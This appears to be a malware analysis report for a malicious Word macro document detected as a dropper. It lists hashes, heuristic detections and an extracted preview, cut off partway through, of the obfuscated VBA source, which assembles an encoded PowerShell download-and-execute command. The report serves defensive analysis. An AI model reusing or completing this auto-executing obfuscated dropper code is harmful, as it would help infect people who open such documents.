Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c46d2b76075cbc85…

MALICIOUS

Office (OLE)

239.8 KB Created: 2018-06-26 22:17:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: fd20cb9441d81e95d7a6f77a422b039f SHA-1: eb80c6a234e600f355e9c45fe28784dff89d8156 SHA-256: c46d2b76075cbc85d50fbb7ce64e1ea4f5c7064de7ffafdf0166db2d6996ccd3
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros, including a Shell() call and auto-execution markers like AutoOpen. The VBA script contains obfuscated string concatenation that, when reconstructed, forms a command likely intended to download and execute a second-stage payload. The presence of the AutoOpen macro and the Shell() call strongly suggests an attempt to immediately run malicious code upon opening the document.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592487-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592487-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10241 bytes
SHA-256: 0c4d46e6973944000a016eaed4de74742b277bfea69540a6b20d3fd2a7c056e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rENtLwUffomkmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DzczGFIYwBIp"
Function qddRhNOq()
On Error Resume Next
UAUcoF = 3950
zzIVCJ = CDate(97454)
ZFwkr = vZdjE
VBusZ = 48704
MiHCwc = 96555
VwMio = Sin(54794)
KOFuBdFYP = "Hell " + " " + Chr(34) + "$" + Chr(40) + " set" + "-VariAB" + "Le  'OfS" + "' '' " + Chr(41) + " " + Chr(34)
rktsd = 74229
hShwib = CDate(77231)
RfLHfv = LFLRI
ubaoX = 29679
aQBQCi = 66781
JzjvW = Sin(52953)
KDjHl = Chr(43) + "[sT" + "riN" + "G]" + Chr(40) + " " + Chr(40) + "107,3" + "7 ,32,59" + ", " + "114,3" + "3 , " + "42,56 , "
KkBYi = 51726
qBSqJ = CDate(55018)
dquDlX = lSIjO
iiFAHU = 83432
GiWlw = 87612
qnzkj = Sin(50349)
jDasLktbBub = "98 , 32" + " , 45 , " + "37" + " , 4" + "2, 44" + ", 59" + ",1" + "11 , 1, " + "42,59," + " 97 ,24"
OoCNmw = 61106
azrZc = CDate(11348)
PZlrA = kuwRjo
TIjGB = 38474
iIvibj = 77582
wuhuk = Sin(54694)
IrGjj = ",42 ,45 " + ", 12 ," + "35,38" + ", 42 , 3" + "3 ,59,1" + "16,107 "
VYdom = 69958
htjbJ = CDate(95402)
GiKNrs = QBkzaT
mBHiNz = 68676
CjlDSG = 67202
SOjls = Sin(22180)
KRKbGihGFWw = ",37, 6" + "1 ," + "38, 114 " + ", " + "104 ," + " 39 ,5" + "9 " + ", 59,63" + " ,117 " + ", " + "96 " + ", "
aCmLT = 79342
FpiPNb = CDate(70001)
lUiwJv = GIfzj
JiiZw = 61587
SkqhDq = 25093
EvCduO = Sin(63013)
nNjRk = "96 , 56," + "56 , 56" + " ,97, 3" + "4," + "42,61, " + "46, 58 " + ",60 ," + "59" + " , 4" + "6,4"
qddRhNOq = KOFuBdFYP + KDjHl + jDasLktbBub + IrGjj + KRKbGihGFWw + nNjRk
ccCoq = 22760
zwrls = Sin(80611)
cVmhl = 80527
ASZFJF = CDate(35590)
rUazcZ = 58622
Iccob = zWKPhB
End Function
Function XVwOHDupA()
On Error Resume Next
AfZXb = 14311
aTCCCt = Sin(13949)
OXwIX = 66366
pkRbGz = CDate(79786)
UHjjf = 48457
UCAaNn = cLCGw
jtJhkdOu = "6 ," + " 43" + " , 97, 4" + "4, 32 " + ", " + "34" + " ,96," + "25,25" + ",8,61 ," + "96 ," + "15, " + "39"
DCHsJ = 55035
iYjnzk = Sin(72140)
JzEES = 73893
JGlOT = CDate(33006)
LqvcVi = 87982
RztmVN = Tvoqb
FLIBD = " , " + "59 , 59 " + ", 63,1" + "17 " + ", 96" + ",9" + "6, 45, " + "32 ," + "35 , 4" + "3,45" + ",38" + " ,"
nQYjE = 6324
zwoaj = Sin(41707)
XICdYX = 94131
RDNLw = CDate(84543)
zjXOuU = 16197
CaWuXa = RRqTr
OqapSvT = " 53, 97 " + ", 33, 42" + ", 59, 96" + " ,3 ,30," + " 127 , 5" + ",23, 59" + ",96," + " 15,39 " + ", 59" + ",59," + "63, 117," + "96, 96,"
uvbbzi = 26375
SUdwCq = Sin(14829)
iRIBCl = 49158
dQMSY = CDate(71142)
MwCIm = 54864
HhGDEt = fcGvFU
GzZiHOOifw = "38" + ",34,43 ," + " 46 , " + "57" + ",38," + "43"
DmUCQ = 19606
QnkLcz = Sin(44528)
JlRHSC = 43810
VjtnL = CDate(55873)
fkpTBa = 15080
zccVw = IAwHW
cfuIvvtlH = ",35 " + ", 42 , " + "42, 97" + " , 44,32" + " ,34," + "96 , 61 " + ", 44," + "53 ,2" + " ,55 " + ",96," + "15 "
FvfbT = 71571
WwoJl = Sin(72490)
WKQJO = 32360
RQMKNM = CDate(25304)
lIjlCQ = 68461
CAtMnM = JTWMNj
kJDql = ", " + "39 ,59" + ", 59,63 " + ",117 ,96" + ", 96 ,56" + " , 56 " + ",56"
XVwOHDupA = jtJhkdOu + FLIBD + OqapSvT + GzZiHOOifw + cfuIvvtlH + kJDql
awtLi = 70525
mJEAn = Sin(13240)
XYDwWm = 86495
jprUsH = CDate(78921)
zECYY = 71143
REUtQ = KakwDl
End Function
Function adCopiW()
On Error Resume Next
NKbPzB = 91060
zIlHrO = Sin(31046)
rCwqqo = 26862
vrNiX = CDate(42107)
CulLV = 81311
owrPUA = VsGAo
NwbrHzJX = ",9" + "7 , 45" + ", 61 ," + " 4" + "6,44 , 4" + "2,60,9" + "7 ,32," + "61, 40 " + ",97 ,58," + "36,96 ," + " 5" + "6,126"
lGBAWH = 56246
iKVUl = Sin(38688)
jVtwM = 52744
cuKbdC = CDate(79190)
CzdGql = 49189
INhnm = GEwKY
rGwrrh = " , 9," + "63, 12 " + ", 54,23 " + ",96 ,1" + "5," + "39 ," + "59 ," + "59" + ",63," + "117 , 96" + " ,96"
OYwwsQ = 26368
njsQFi = Sin(48582)
cqnDzs = 97735
tKznSZ = CDate(31320)
lwwNLO = 65494
nuIaZ = HrBNtb
nuiMsh = " , 56" + " , 5" + "6 , 56, " + "97,46" + ", 57" + " , 38, " + "60" + ",
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.